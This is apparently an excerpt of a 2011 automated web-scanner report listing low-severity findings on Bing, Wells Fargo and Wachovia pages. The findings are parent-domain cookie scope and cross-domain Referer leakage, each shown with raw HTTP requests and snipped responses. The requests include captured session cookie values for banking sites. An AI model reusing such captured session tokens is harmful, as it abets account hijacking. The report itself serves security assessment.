Set-Cookie: SRCHD=D=1865529&MS=1865529&SM=1&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:57 GMT; domain=.bing.com; path=/

.Content UL{margin:0;padding:0;list-style-type:none}.Content LI{display:block;list-style-type:none}.QueryAlterations{margin-bottom:.38em;padding-bottom:.38em;color:#333}.Header .QueryAlterations{borde
...[SNIP]...

13.26. http://www.bing.com/news/s/news3S_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.js?v=0829160238 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 29 Aug 2010 16:02:38 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4140
Date: Tue, 19 Jul 2011 12:11:10 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:10 GMT; domain=.bing.com; path=/

function _changeHeight(g,e,b,c){var d,a=e,f=function(){if(a<b&&a+c<b||a>b&&a+c>b)a+=c;else{a=b;clearInterval(d)}g.style.height=a+"px"};d=setInterval(f,20)}function _p(a){return a.parentNode}function _
...[SNIP]...

13.27. http://www.bing.com/videos/vthumb_c.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/vthumb_c.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/vthumb_c.css?v=0819000746 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Thu, 19 Aug 2010 00:07:46 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 1540
Date: Tue, 19 Jul 2011 12:11:14 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:14 GMT; domain=.bing.com; path=/

.vt_med,.vt_med img{display:-moz-inline-stack;display:inline-block;position:relative;width:140px}.vt_md{margin-top:5px;font-size:95%}.vt_md a{text-decoration:none}.vt_md .st_c{color:#568e1a;float:left
...[SNIP]...

13.28. https://www.wellsfargo.com/tas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Content-Length: 206
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER

pageURL=https%3A//www.wellsfargo.com/&ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&pageID=per_home&tz=-300&r=&App_ID=WWW&RequestType=ContentR
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:02 GMT
Content-type: text/html
Set-cookie: TCID=0007b089-750d-8c50-be96-e99900000049;Domain=.wellsfargo.com;Expires=Thu, 18-Jul-2013 09:41:02 GMT;Path=/;Secure
Set-cookie: NSC_XfmmtGbshp4=445b32067863;Domain=.wellsfargo.com;Expires=Tue, 19-Jul-2011 13:41:02 GMT;Path=/
Content-Length: 1575

/*[{"href":"https://adfarm.mediaplex.com/ad/ck/10918-69547-3408-26","contentId":"WF_CON_HP_PRIMARY_BNR","src":"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/img/ads/tas/consumer/primary/
...[SNIP]...

14. Cross-domain Referer leakage
There are 11 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


14.1. https://online.wellsfargo.com/das/channel/enrollDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /das/channel/enrollDisplay?LOB=CONS&OFFERCODE=WEB HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 10:03:24 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Set-Cookie: KCOOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Set-Cookie: BRAND_COOKIE=COB; domain=.wellsfargo.com; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<a href="https://www.wellsfargo.com"><img src="https://a248.e.akamai.net/7/248/3608/bb61162e7a787f/online.wellsfargo.com/das/common/images/logo_62sq.gif" id="logo" alt="Wells Fargo Home Page" /></a><img src="https://a248.e.akamai.net/7/248/3608/53845d4a1846e7/online.wellsfargo.com/das/common/images/coach.gif" id="coach" alt="" /><a href="https://www.wellsfargo.com/auxiliary_access/aa_talkatmloc"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Talking ATM Locations" border="0" height="1" width="1"/></a><a href="#skip"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Skip to page content" border="0" height="1" width="1" /></a>
...[SNIP]...
</div>
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim1" alt="" height="1"/></td>
...[SNIP]...
<td colspan="2"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim2" alt="" height="1"/></td>
...[SNIP]...
<div class="tabUnderline">
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/common/images/shim.gif" height="1" width="1" alt="" /></div>
...[SNIP]...
<div class="c4P webwib"> <img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="minWidth" alt="" />


<div id="title">
...[SNIP]...
<td id="layoutBottom1"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="" height="1" width="1" /></td>
...[SNIP]...
<noscript>
                                       <img
                                       src="https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5?COL01STO=1&Unique_ID=B-20110719024057407636411"
                                       border="0" height="1" width="1" alt="">

                                   </noscript>
...[SNIP]...

14.2. https://online.wellsfargo.com/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<a href="https://www.wellsfargo.com"><img src="https://a248.e.akamai.net/7/248/3608/bb61162e7a787f/online.wellsfargo.com/das/common/images/logo_62sq.gif" id="logo" alt="Wells Fargo Home Page" /></a><img src="https://a248.e.akamai.net/7/248/3608/53845d4a1846e7/online.wellsfargo.com/das/common/images/coach.gif" id="coach" alt="" /><a href="https://www.wellsfargo.com/auxiliary_access/aa_talkatmloc"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Talking ATM Locations" border="0" height="1" width="1"/></a><a href="#skip"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Skip to page content" border="0" height="1" width="1" /></a>
...[SNIP]...
</div>
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim1" alt="" height="1"/></td>
...[SNIP]...
<td colspan="2"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim2" alt="" height="1"/></td>
...[SNIP]...
<div class="tabUnderline">
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/common/images/shim.gif" height="1" width="1" alt="" /></div>
...[SNIP]...
<div class="c4P webwib"> <img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="minWidth" alt="" />


<div id="title">
...[SNIP]...
<td id="layoutBottom1"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="" height="1" width="1" /></td>
...[SNIP]...

14.3. https://onlineservices.wachovia.com/auth/AuthService

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /auth/AuthService?action=presentLogin&logincode=brokerageWachsec&url=https%3a//wachseconline.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069189096-New%7C1342605189096%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:53 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 16325

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta http-equiv="Pragma" content="no-store">
<meta http-equiv="Pragma: no-store">
<meta http-equiv="Cache Control"
...[SNIP]...
</title>

<script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="logo_image"><img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/pp_toplogo3.gif" /></div>
...[SNIP]...
<a href="#" onClick="window.history.back();return false;" onMouseOver="window.status='Back';return true" onMouseOut="window.status='';return true"><img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/btn_back2.gif" width="45" height="20" alt="Go back to previous page" border="0"></a>
...[SNIP]...
</strong>
<a href="https://www.wellsfargoadvisors.com/signup/index.htm">Sign
up online</a>
...[SNIP]...
</strong>
<a
href="https://www.wellsfargoadvisors.com/financial-services/account-services/online-financial-services.htm">
Learn more</a>
...[SNIP]...
</span>
<a
href="https://www.wellsfargoadvisors.com/disclosures/security.htm">
Learn
more</a>
...[SNIP]...
<div style="text-align:center;">
       <a href=https://www.wellsfargoadvisors.com/demo/index.htm"
           onClick="newpop('https://www.wellsfargoadvisors.com/demo/index.htm','generalpopup','no','no','no','no','no','yes','yes',710,550,10,10);return false;"
           onmouseover="window.status='View Demo';return true" onMouseOut="window.status='';return true">

               <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/btn_demo3.gif" width="82" height="20" alt="Click here to View Demo" border="0">
       </a>
...[SNIP]...
<div id="disc_image"><img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/DisclaimerB-W.gif" width="436" height="41" alt="" /></div>
...[SNIP]...
<!-- id="v2_disclaimer" -->

       
                               <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

14.4. https://onlineservices.wachovia.com/identity/IdentityMgr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:56 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 18355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
</title>


   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />

   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
   <style type="text/css">
...[SNIP]...
</style>
   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />


   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="header">
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/logo_cobrand.gif" alt="Wachovia A Wells Fargo Company" id="logo" />
       <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" id="subbrand" />
   </div>
...[SNIP]...
<li class="first" id="officelocator"><a href="https://www.wellsfargoadvisors.com/" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a>
...[SNIP]...
</script>

   
   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

14.5. https://onlineservices.wachovia.com/identity/IdentityMgr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /identity/IdentityMgr?action=resetPasswordBegin&returnurl=/auth/AuthService&logincode=brokerageWachsec HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://onlineservices.wachovia.com/auth/AuthService?action=presentLogin&logincode=brokerageWachsec&url=https%3a//wachseconline.wachovia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069189096-New%7C1342605189096%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:55:04 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 13241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</title>


   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />

   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
   <style type="text/css">
...[SNIP]...
</style>
   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />


   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="header">
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/logo_cobrand.gif" alt="Wachovia A Wells Fargo Company" id="logo" />
       <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/pcgb_logotype.gif" alt="" id="subbrand" />
   </div>
...[SNIP]...
<li class="first" id="officelocator"><a href="https://www.wellsfargoadvisors.com/" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a>
...[SNIP]...
</script>


